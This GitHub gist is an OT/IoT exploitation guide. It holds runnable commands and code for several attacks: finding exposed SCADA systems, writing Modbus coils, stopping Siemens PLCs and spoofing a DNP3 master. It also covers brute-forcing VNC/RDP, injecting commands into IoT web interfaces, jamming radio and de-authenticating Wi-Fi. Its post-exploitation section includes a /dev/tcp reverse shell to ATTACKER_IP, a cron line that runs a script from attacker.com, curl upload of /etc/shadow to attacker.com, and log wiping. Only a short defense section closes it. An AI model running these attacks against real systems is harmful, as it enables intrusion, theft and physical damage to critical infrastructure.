Skip to content

Instantly share code, notes, and snippets.

@aw-junaid

aw-junaid/Operational Technology.md

Created January 30, 2026 19:02
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save aw-junaid/e5393ee0715383c3f6ffefc141c7b487 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save aw-junaid/e5393ee0715383c3f6ffefc141c7b487 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Operational Technology.md

Operational Technology (OT) & IoT Security Exploitation Guide

Comprehensive guide to OT/IoT security testing covering ICS/SCADA protocols, industrial control systems, IoT device exploitation, firmware analysis, hardware interfaces, and wireless protocols with practical attack methodologies and defense strategies.

OT Security Architecture & Threat Landscape

OT vs IT Security Differences

Aspect IT Security OT Security
Primary Concern Data confidentiality System availability
Patching Regular updates Limited, scheduled
Lifespan 3-5 years 15-30 years
Risk Tolerance Medium Very Low
Impact Financial loss Physical damage, safety risks
Protocols TCP/IP, HTTP Modbus, DNP3, PROFINET

Critical Infrastructure Sectors

  1. Energy - Power grids, oil & gas pipelines
  2. Water - Treatment plants, distribution systems
  3. Transportation - Air traffic, rail systems
  4. Manufacturing - Industrial control systems
  5. Healthcare - Medical devices, hospital systems
  6. Communications - Telecom networks

OT Protocol Enumeration & Exploitation

Common OT Protocols & Ports

Protocol Port Purpose Tool
Modbus 502 Process automation modscan, mbtget
DNP3 20000 Electrical grid control dnp3-map
S7comm 102 Siemens PLCs s7scan, snap7
PROFINET 34962/34964 Industrial Ethernet profinetd
EtherNet/IP 44818 Allen-Bradley PLCs enip-tools
BACnet 47808 Building automation bacnet-utils
IEC 61850 102 Electrical substations libiec61850
OPC UA 4840 Data exchange opcua-client

Network Discovery & Enumeration

Shodan Dorks for OT Systems:

# Modbus
"port:502" "product:modbus"
"port:502" "content:modbus"

# Siemens S7
"port:102" "Siemens"
"port:102" "S7comm"

# Allen-Bradley
"port:44818" "Rockwell"
"port:44818" "EtherNet/IP"

# General ICS/SCADA
"SCADA" "port:102,502,20000,44818"
"PLC" "port:102,502"
"industrial control"

# VNC/RDP for HMIs
"port:5900" "RFB 003.008"
"port:3389" "MS RDP"

Nmap Scripts for OT:

# Comprehensive OT scan
nmap -sS -sV -p 102,502,20000,44818,47808,34962-34964 --script="*scada*" target

# Modbus discovery
nmap --script modbus-discover -p 502 target

# Siemens S7 scan
nmap --script s7-info -p 102 target

# BACnet scan
nmap --script bacnet-info -p 47808 target

# All known ICS ports
nmap -p 102,502,20000,2404,4000,4840,4843,4911,9600,1883,20547,34962-34964,44818,47808 target

Masscan for Large Networks:

# Fast OT port scanning
masscan -p102,502,20000,44818,47808,34962-34964 10.0.0.0/8 --rate=10000

# Output to file
masscan -p102,502 192.168.0.0/16 -oL ot_scan.txt

Protocol-Specific Exploitation

Modbus Protocol Attacks

Enumeration:

# Using modscan
python3 modscan.py -t target_ip -p 502

# Enumerate devices
modscan.py -a target_ip -p 502 -t 0 -r 1-100

# Read holding registers
mbtget -a 1 -r 40001-40010 -p 502 target_ip

# Write to coils (dangerous!)
mbtget -a 1 -f 0 -c 1 -v 1 -p 502 target_ip

Metasploit Modules:

use auxiliary/scanner/scada/modbusclient
set RHOSTS target_ip
set RPORT 502
run

# Write single coil (turn on/off)
use auxiliary/admin/scada/modbus_write_coil
set RHOST target_ip
set RPORT 502
set UNIT_ID 1
set COIL_ADDR 0
set COIL_VALUE 1
run

Python Exploitation:

from pymodbus.client import ModbusTcpClient

client = ModbusTcpClient('target_ip', port=502)
client.connect()

# Read coils
result = client.read_coils(0, 10)
print(f"Coils: {result.bits}")

# Write coil (turn on)
client.write_coil(0, True)

# Read holding registers
result = client.read_holding_registers(40001, 10)
print(f"Registers: {result.registers}")

# Write register (change value)
client.write_register(40001, 1000)

Siemens S7 Protocol Attacks

Enumeration:

# Using s7scan
python3 s7scan.py -t target_ip

# With snap7
python3 -c "
import snap7
client = snap7.client.Client()
client.connect('target_ip', 0, 1)
print(client.get_cpu_info())
client.disconnect()
"

# Metasploit
use auxiliary/scanner/scada/siemens_s7_scan
set RHOSTS target_ip
run

Stop CPU (Denial of Service):

from snap7.client import Client

client = Client()
client.connect('target_ip', 0, 1)
client.plc_stop()  # Stops PLC operation

Read/Write Memory:

from snap7.util import *
from snap7.client import Client

client = Client()
client.connect('target_ip', 0, 1)

# Read memory area
data = client.read_area(0x84, 0, 0, 100)  # DB area
value = get_int(data, 0)
print(f"Value: {value}")

# Write to memory
data = bytearray(2)
set_int(data, 0, 9999)
client.write_area(0x84, 0, 0, data)

DNP3 Protocol Attacks

Enumeration:

# Using dnp3-map
python3 dnp3-map.py -t target_ip -p 20000

# Scan for DNP3
nmap --script dnp3-info -p 20000 target_ip

# Metasploit
use auxiliary/scanner/scada/dnp3_scan
set RHOSTS target_ip
run

Master Spoofing:

from pydnp3 import opendnp3, asiodnp3, asiopal

# Create fake master
stack_config = asiodnp3.DNP3Manager()
channel = stack_config.add_channel(
    "client",
    asiopal.ChannelRetry().defaults(),
    "0.0.0.0",
    20000,
    asiodnp3.PrintingChannelListener().Create()
)

master = channel.add_master(
    "master",
    asiodnp3.PrintingSOEHandler().Create(),
    asiodnp3.DefaultMasterApplication().Create(),
    opendnp3.MasterStackConfig()
)

# Send control commands
command = opendnp3.ControlRelayOutputBlock(
    opendnp3.ControlCode.LATCH_ON,
    1,
    1000,
    opendnp3.CommandStatus.SUCCESS
)

master.direct_operate(command, 0)

EtherNet/IP (Allen-Bradley) Attacks

Enumeration:

# Using enip-tools
python3 enip.py -i target_ip scan

# List services
python3 enip.py -i target_ip list_services

# List identity
python3 enip.py -i target_ip list_identity

Read/Write Tags:

from cpppo.server.enip import client

# Read tag
with client.connector(host='target_ip') as conn:
    operations = [('@4/1/3', 'SINT')]  # Read tag at path
    failures, responses = conn.synchronous(operations=operations)
    print(f"Value: {responses[0]}")

# Write tag
with client.connector(host='target_ip') as conn:
    operations = [('@4/1/3=42', 'SINT')]  # Write value 42
    failures, _ = conn.synchronous(operations=operations)

BACnet Protocol Attacks

Enumeration:

# Using bacnet-utils
bacdiscover -d target_ip

# Read device properties
baccfg -d target_ip -a 1001 read Device 1 objectName

# Write property (if writable)
baccfg -d target_ip -a 1001 write Device 1 objectName "HACKED"

# Metasploit
use auxiliary/scanner/scada/bacnet_discover
set RHOSTS target_ip
run

Denial of Service:

# Flood with Who-Is requests
python3 -c "
from bacpypes.local.device import LocalDeviceObject
from bacpypes.apdu import WhoIsRequest
from bacpypes import Address

# Create broadcast request
request = WhoIsRequest()
request.pduDestination = Address('192.168.1.255/47808')

# Send repeatedly
for _ in range(1000):
    request.encode()
"

HMI & Remote Access Exploitation

VNC (Virtual Network Computing)

Discovery:

# Shodan search
"vnc port:5900 country:us"
"RFB 003.008"

# Nmap scan
nmap -p 5900-5910 -sV --script vnc-info,vnc-title target

# Mass scanning
masscan -p5900-5910 10.0.0.0/8 --rate=10000

# Check for authentication
nc -zv target_ip 5900
echo "RFB 003.008\n" | nc target_ip 5900

Brute Force Attacks:

# Using Hydra
hydra -L users.txt -P passwords.txt -s 5900 -f -vV target_ip vnc

# Using Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS target_ip
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwords.txt
run

# Using vncrack
vncrack -P passwords.txt -u username -H target_ip -v 5900

Exploitation:

# Connect with vncviewer
vncviewer target_ip::5900

# With password
vncviewer -passwd password.txt target_ip:5900

# Autopass (if password stored)
vncviewer -autopass target_ip:5900

# Screenshot capture
vncsnapshot target_ip:5900 screenshot.jpg

RDP (Remote Desktop Protocol)

Discovery:

# Shodan search
"port:3389 product:"Microsoft Terminal Services""
"rdp country:de"

# Nmap scan
nmap -p 3389 -sV --script rdp-enum-encryption,rdp-ntlm-info target

# Check for BlueKeep vulnerability
nmap -p 3389 --script rdp-vuln-ms12-020 target

# Mass scanning
masscan -p3389 192.168.0.0/16 --rate=5000

Brute Force Attacks:

# Using Hydra
hydra -L users.txt -P passwords.txt -s 3389 -f -vV target_ip rdp

# Using Crowbar
crowbar -b rdp -s target_ip/32 -u users.txt -C passwords.txt

# Using Ncrack
ncrack -vv --user username -P passwords.txt rdp://target_ip

# Using Medusa
medusa -u username -P passwords.txt -h target_ip -M rdp

Exploitation:

# Connect with rdesktop
rdesktop -u administrator -p Password123 -g 1024x768 -a 16 target_ip

# With xfreerdp (supports NLA)
xfreerdp /u:administrator /p:Password123 /v:target_ip /cert-ignore

# With Remmina
remmina --connect rdp://administrator:Password123@target_ip

# Pass-the-hash attack
xfreerdp /u:administrator /pth:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 /v:target_ip

TR-069 (CWMP) Exploitation

Discovery:

# Shodan search
"port:7547 product:"TR-069""
"CWMP"

# Nmap scan
nmap -p 7547 -sV --script tr069-discover target

# Check for exposed interfaces
curl -k https://target_ip:7547/
curl http://target_ip:7547/

Exploitation:

# Using genieacs
python3 genieacs.py --host target_ip --port 7547 --list

# Brute force credentials
hydra -L users.txt -P passwords.txt -s 7547 target_ip http-post-form \
"/:username=^USER^&password=^PASS^:Invalid"

# SOAP injection
curl -X POST http://target_ip:7547/ \
-H "Content-Type: text/xml" \
-d '<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<GetParameterValues>
<ParameterNames>
<string>InternetGatewayDevice.</string>
</ParameterNames>
</GetParameterValues>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'

ICS/SCADA Specific Software Exploitation

PRTG Network Monitor

Discovery:

# Shodan search
"title:PRTG inurl:/public"
"PRTG Traffic Grapher"

# Directory enumeration
gobuster dir -u http://target_ip -w /usr/share/wordlists/dirb/common.txt \
-x php,html,aspx

# Version detection
curl -I http://target_ip/ | grep -i "PRTG"

Exploitation:

# Metasploit module
use exploit/windows/http/prtg_authenticated_rce
set RHOSTS target_ip
set RPORT 80
set USERNAME prtgadmin
set PASSWORD prtgadmin
set TARGETURI /
exploit

# Directory traversal (CVE-2018-9276)
curl "http://target_ip/public/login.htm?tabid=0&username=..\..\..\..\..\windows\system.ini"

# API key extraction
curl "http://target_ip/api/table.xml?content=sensors&columns=objid,group,device,probe,sensor&loginurl=/public/login.htm&username=prtgadmin&password=prtgadmin"

WinCC (Siemens)

Discovery:

# Shodan search
"port:102 product:WinCC"
"Siemens SIMATIC WinCC"

# Web interface
nmap -p 80,443 --script http-title target

Exploitation:

# Database access (default credentials)
sqsh -S WinCC -U wincc -P wincc

# Directory traversal
curl "http://target_ip/WinCC/scripts/..\..\..\..\windows\system.ini"

# Metasploit modules
use exploit/windows/scada/wincc_webexec
use auxiliary/admin/scada/wincc_a7_dataget

InduSoft Web Studio

Discovery:

# Shodan search
"InduSoft Web Studio"
"port:1234 product:InduSoft"

# Default credentials
admin/1234
admin/admin

Exploitation:

# Directory traversal (CVE-2017-16744)
curl "http://target_ip:1234/../../windows/system.ini"

# Buffer overflow (CVE-2017-16743)
python3 -c "
import socket
s = socket.socket()
s.connect(('target_ip', 1234))
payload = 'A' * 5000
s.send(payload)
"

IoT Device Exploitation Methodology

Firmware Analysis

Initial Analysis:

# Identify file type
file firmware.bin

# Extract strings
strings firmware.bin | head -100
strings -n 8 firmware.bin > strings.txt
strings -tx firmware.bin | grep -i "password\|admin\|root"

# Check entropy
binwalk -E firmware.bin

# List embedded files
binwalk firmware.bin

# Extract file system
binwalk -e firmware.bin

Advanced Analysis:

# Using FACT (Firmware Analysis and Comparison Tool)
cd /opt/fact
sudo python3 -m fact.firmware firmware.bin

# Using EMBBA
sudo ./emba.sh -f firmware.bin -l ./logs -p ./scan-profiles/default

# Using Firmware Analysis Toolkit (FAT)
sudo python3 ./fat.py firmware.bin --qemu 2.5.0

# Extract with fmk
./extract-firmware.sh firmware.bin

Filesystem Examination:

# Mount extracted filesystem
sudo mount -o loop extracted.squashfs /mnt/firmware

# Search for sensitive files
find /mnt/firmware -type f -name "*.pem" -o -name "*.key" -o -name "*password*"
find /mnt/firmware -type f -exec grep -l "password" {} \;
find /mnt/firmware -type f -perm -4000  # SUID files

# Check configuration files
cat /mnt/firmware/etc/passwd
cat /mnt/firmware/etc/shadow
cat /mnt/firmware/etc/config/*

Hardware Interfaces Exploitation

UART (Universal Asynchronous Receiver-Transmitter)

Identification:

# Look for 4 pins: VCC, GND, TX, RX
# Use multimeter to identify:
# GND: 0V continuous
# VCC: 3.3V or 5V
# TX: Fluctuating voltage
# RX: Steady voltage

# Common baud rates: 115200, 9600, 57600, 38400

Connection & Exploitation:

# Using screen
screen /dev/ttyUSB0 115200

# Using minicom
minicom -D /dev/ttyUSB0 -b 115200

# Using cu
cu -l /dev/ttyUSB0 -s 115200

# Common commands once connected:
# Interrupt boot process (Ctrl+C, Ctrl+Z, Enter)
# Check for bootloader prompt (U-Boot, RedBoot)
# Access shell

Bootloader Exploitation:

# U-Boot common commands
printenv  # Show environment variables
setenv bootargs "console=ttyS0,115200 init=/bin/sh"  # Change init
saveenv  # Save changes
boot  # Continue booting

# RedBoot commands
fis list  # List flash partitions
load -r -b 0x80000000 firmware.bin  # Load new firmware
fis create rootfs  # Write to flash

JTAG (Joint Test Action Group)

Identification:

# Look for 20-pin or 10-pin connector
# Common pinouts:
# TDI, TDO, TCK, TMS, TRST, VREF, GND

# Using OpenOCD for detection
openocd -f interface/jlink.cfg -c "transport select jtag" -c "adapter_khz 1000" -c "init"

Exploitation with OpenOCD:

# Start OpenOCD server
openocd -f interface/jlink.cfg -f target/arm7tdmi.cfg

# Connect with telnet
telnet localhost 4444

# Common commands:
> halt  # Stop CPU
> reg  # Show registers
> mdw 0x00000000 10  # Read memory
> mww 0x00000000 0xdeadbeef  # Write memory
> load_image firmware.bin 0x80000000  # Load firmware
> resume  # Continue execution

GDB Debugging:

# Connect GDB to OpenOCD
arm-none-eabi-gdb firmware.elf
(gdb) target remote localhost:3333
(gdb) monitor halt
(gdb) info registers
(gdb) break main
(gdb) continue

SWD (Serial Wire Debug)

Connection:

# 4 pins: SWDIO, SWCLK, GND, VREF
openocd -f interface/stlink-v2.cfg -c "transport select swd" -f target/stm32f1x.cfg

Dumping Flash:

# In OpenOCD telnet
> dump_image flash.bin 0x08000000 0x10000  # Dump 64KB

# Using pyOCD
pyocd-flashtool -t stm32f103 -ce  # Chip erase
pyocd-flashtool -t stm32f103 -r flash.bin  # Read flash

SPI (Serial Peripheral Interface)

Sniffing with Bus Pirate:

# Connect: MOSI, MISO, CLK, CS
# Initialize
m  # Set mode
5  # SPI
4  # 30kHz
1  # Output type
W  # Power supplies on

# Sniff traffic
(1)  # Start sniff
(1)  # Stop sniff

Flash Dumping:

# Using flashrom
flashrom -p linux_spi:dev=/dev/spidev0.0 -r firmware.bin

# Using SPI with Arduino
# Use SPI library to read/write flash chips

I2C (Inter-Integrated Circuit)

Enumeration:

# Scan for devices
i2cdetect -y 1  # Raspberry Pi
i2cdetect -y 0  # Other boards

# Read from device
i2cget -y 1 0x50 0x00  # Read byte from address 0x50
i2cdump -y 1 0x50  # Dump all registers

# Write to device
i2cset -y 1 0x50 0x00 0xFF  # Write byte

EEPROM Dumping:

# Dump entire EEPROM
dd if=/sys/bus/i2c/devices/1-0050/eeprom of=eeprom.bin

# Using flashrom
flashrom -p buspirate_spi:dev=/dev/ttyUSB0 -r eeprom.bin

Wireless Protocol Attacks

Zigbee/Z-Wave

Sniffing with KillerBee:

# List devices
sudo zbid

# Sniff traffic
sudo zbwireshark  # GUI
sudo zbdump -i /dev/ttyUSB0 -w capture.pcap  # CLI

# Capture specific channel
sudo zbdump -i /dev/ttyUSB0 -c 15 -w channel15.pcap

# Replay attack
sudo zbreplay -i /dev/ttyUSB0 -r capture.pcap -f 1

# Packet injection
sudo zbinject -i /dev/ttyUSB0 -c 15 -p "malicious_packet"

Exploitation:

# Crack network key
sudo zbgoodfind -r capture.pcap

# De-authentication attack
sudo zbstumbler -i /dev/ttyUSB0

# Key extraction from devices
# Requires physical access to extract keys from chips

Bluetooth Low Energy (BLE)

Discovery:

# Scan for devices
sudo hcitool lescan
sudo bluetoothctl scan on

# Get device info
sudo hcitool leinfo MAC_ADDRESS

GATT Enumeration:

# Using gatttool
gatttool -b MAC_ADDRESS -I
[CONNECTED]> primary
[CONNECTED]> characteristics
[CONNECTED]> char-read-hnd 0x000c

Exploitation with GATTacker:

# Clone BLE device
node clone.js MAC_ADDRESS

# MITM attack
node advertise.js -s "Spoofed Device"

# Fuzzing
python3 ble_fuzzer.py -t MAC_ADDRESS

LPWAN (LoRaWAN, Sigfox)

LoRaWAN Sniffing:

# Using gr-lora
gnuradio-companion  # Use LoRa receiver flowgraph

# Using SDR with Lorawan decoder
rtl_sdr -f 868000000 -s 1000000 -g 40 - | lorawan-decoder

# Capture packets
sudo tshark -i lo -Y "lorawan" -w lorawan.pcap

Replay Attacks:

# Record transmission
rtl_sdr -f 868000000 -s 1000000 -g 40 capture.bin

# Replay with HackRF
hackrf_transfer -t capture.bin -f 868000000 -s 1000000 -a 1 -x 40

Jamming:

# Generate noise
hackrf_transfer -t noise.bin -f 868000000 -s 1000000 -a 1 -x 40

Wi-Fi Attacks on IoT

De-authentication:

# Using aireplay-ng
aireplay-ng -0 10 -a AP_MAC -c CLIENT_MAC wlan0mon

# Using mdk4
mdk4 wlan0mon d -b blacklist.txt -c 1

WPA2 Enterprise Attacks:

# EAP attack with hostapd-wpe
hostapd-wpe hostapd-wpe.conf

# Capture credentials
asleap -r capture.cap -f wordlist.txt

WPS PIN Attacks:

# Using Reaver
reaver -i wlan0mon -b AP_MAC -vv

# Using bully
bully wlan0mon -b AP_MAC -p 12345670

Web Interface & API Attacks

Default Credentials:

# Common IoT defaults
admin/admin
admin/password
root/root
user/user
support/support
technician/technician

# Manufacturer-specific
Cisco/Cisco
D-Link/admin
Netgear/password
TP-Link/admin
Ubiquiti/ubnt

Directory Enumeration:

# Using Gobuster
gobuster dir -u http://target_ip -w /usr/share/wordlists/dirb/common.txt \
-x php,html,txt,cgi,bin,sh

# Using Dirb
dirb http://target_ip /usr/share/wordlists/dirb/common.txt

# Using FFuF
ffuf -u http://target_ip/FUZZ -w wordlist.txt

API Testing:

# Discover endpoints
curl http://target_ip/api/v1/
curl http://target_ip/rest/
curl http://target_ip/webservices/

# Fuzz parameters
wfuzz -c -z file,wordlist.txt --hc 404 http://target_ip/api/FUZZ

# Test for injection
curl "http://target_ip/api/control?device=1;ls"
curl -X POST http://target_ip/api/config -d "data=<script>alert(1)</script>"

Common IoT Vulnerabilities

Command Injection:

# Test for command injection
curl "http://target_ip/ping?ip=127.0.0.1;whoami"
curl "http://target_ip/ping?ip=127.0.0.1||id"
curl "http://target_ip/ping?ip=127.0.0.1&&cat /etc/passwd"

# Reverse shell
curl "http://target_ip/ping?ip=127.0.0.1;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Path Traversal:

curl "http://target_ip/../../etc/passwd"
curl "http://target_ip/%2e%2e/%2e%2e/etc/passwd"
curl "http://target_ip/..%2f..%2fetc%2fpasswd"

Insecure Direct Object Reference:

# Bypass authorization
curl "http://target_ip/api/user/1"  # Try 2, 3, etc.
curl "http://target_ip/api/device/100/config"

XML External Entity (XXE):

curl -X POST http://target_ip/api/config \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<config>&xxe;</config>'

Server-Side Request Forgery (SSRF):

curl "http://target_ip/proxy?url=http://169.254.169.254/latest/meta-data/"
curl "http://target_ip/proxy?url=file:///etc/passwd"
curl "http://target_ip/proxy?url=gopher://attacker.com:80/_GET%20/internal"

OT/IoT Security Assessment Methodology

Phase 1: Reconnaissance

# 1. Passive reconnaissance
# Use Shodan, Censys, ZoomEye
shodan search "SCADA country:US"
censys search "services.service_name: MODBUS"

# 2. Active scanning
nmap -sS -p 1-65535 -T4 -A -v target
masscan -p1-65535 target --rate=1000

# 3. Protocol identification
nmap --script banner -p- target

Phase 2: Enumeration

# 1. Service enumeration
nmap -sV -sC -p 102,502,20000,44818 target

# 2. Web enumeration
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt

# 3. SNMP enumeration
snmpwalk -c public -v1 target
snmp-check target -c public

Phase 3: Vulnerability Assessment

# 1. Protocol-specific testing
python3 modscan.py -t target -p 502
python3 s7scan.py -t target

# 2. Web vulnerability scanning
nikto -h http://target
wapiti -u http://target

# 3. Credential testing
hydra -L users.txt -P passwords.txt target ssh
hydra -L users.txt -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"

Phase 4: Exploitation

# 1. Protocol exploitation
# Modbus write coil
mbtget -a 1 -f 0 -c 1 -v 1 -p 502 target

# S7 stop CPU
python3 -c "import snap7; client = snap7.client.Client(); client.connect('target', 0, 1); client.plc_stop()"

# 2. Web exploitation
# Command injection
curl "http://target/ping?ip=127.0.0.1;whoami"

# 3. Hardware exploitation
# UART shell access
screen /dev/ttyUSB0 115200

Phase 5: Post-Exploitation

# 1. Establish persistence
echo "*/5 * * * * curl http://attacker.com/shell.sh | bash" >> /etc/crontab

# 2. Lateral movement
# Scan internal network
nmap -sn 192.168.1.0/24

# 3. Data exfiltration
tar czf data.tar.gz /etc/passwd /etc/shadow
curl -X POST -F "file=@data.tar.gz" http://attacker.com/upload

Phase 6: Reporting

# 1. Document findings
# Create detailed report with:
# - Vulnerabilities found
# - Risk assessment
# - Proof of concept
# - Remediation recommendations

# 2. Clean up
# Remove tools, logs, backdoors
rm -rf /tmp/malware
history -c

Defense & Mitigation Strategies

Network Segmentation

# Implement firewall rules
# Example iptables rules for OT network
iptables -A INPUT -p tcp --dport 502 -s 10.0.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 502 -j DROP

# VLAN segmentation
# Separate OT from IT network
vlan 10
 name OT_NETWORK
vlan 20
 name IT_NETWORK

Access Control

# Strong authentication
# Use certificate-based authentication for critical systems
openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 \
-keyout ot_key.pem -out ot_cert.pem

# Role-based access control
# Implement least privilege principle

Monitoring & Detection

# Network monitoring
# Use tools like Security Onion, Wazuh
suricata -c /etc/suricata/suricata.yaml -i eth0

# Anomaly detection
# Monitor for abnormal protocol behavior
# Alert on: Unusual write commands, out-of-range values, etc.

Secure Configuration

# Change default credentials
# Disable unnecessary services
# Regular patching (where possible)
# Network segmentation
# Logging and monitoring

Incident Response

# IR Plan for OT systems
1. Immediate isolation
2. Assess impact on physical processes
3. Preserve forensic evidence
4. Coordinate with operations team
5. System restoration with integrity checks

Tools & Resources

Essential OT/IoT Security Tools

Category Tools
Network Scanning Nmap, Masscan, ZMap
Protocol Analysis Wireshark, tcpdump, Scapy
ICS Protocols modscan, s7scan, dnp3-map, enip-tools
Firmware Analysis Binwalk, FACT, EMBBA, FAT
Hardware Tools JTAGulator, Bus Pirate, Shikra, ChipWhisperer
Wireless KillerBee, Ubertooth, HackRF, RTL-SDR
Exploitation Metasploit, Cobalt Strike, Empire
Vulnerability Scanners Nessus, OpenVAS, Nikto

Online Resources

# Shodan filters for OT
"port:502" "country:US"
"SCADA" "port:102"
"Modbus" "port:502"

# Censys queries
services.service_name: "MODBUS"
443.https.tls.certificate.parsed.names: "scada"

Quick Reference Commands

OT Protocol Discovery

# Quick OT scan
nmap -sS -p 102,502,20000,44818,47808,34962-34964 -oA ot_scan target

# Modbus check
nc -zv target 502
echo -ne "\x00\x01\x00\x00\x00\x06\x01\x03\x00\x00\x00\x01" | nc target 502 | hexdump -C

# S7 check
nc -zv target 102

Common Exploitation

# Modbus write coil (turn on)
python3 -c "
from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('target', port=502)
client.write_coil(0, True)
"

# VNC brute force
hydra -L admin -P rockyou.txt -s 5900 -f -vV target vnc

# RDP connection
xfreerdp /u:administrator /p:Password123 /v:target /cert-ignore

Hardware Access

# UART connection
screen /dev/ttyUSB0 115200

# JTAG debugging
openocd -f interface/jlink.cfg -f target/stm32f1x.cfg
telnet localhost 4444

Firmware Analysis

# Quick analysis
binwalk firmware.bin
strings firmware.bin | grep -i "password\|admin\|root"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment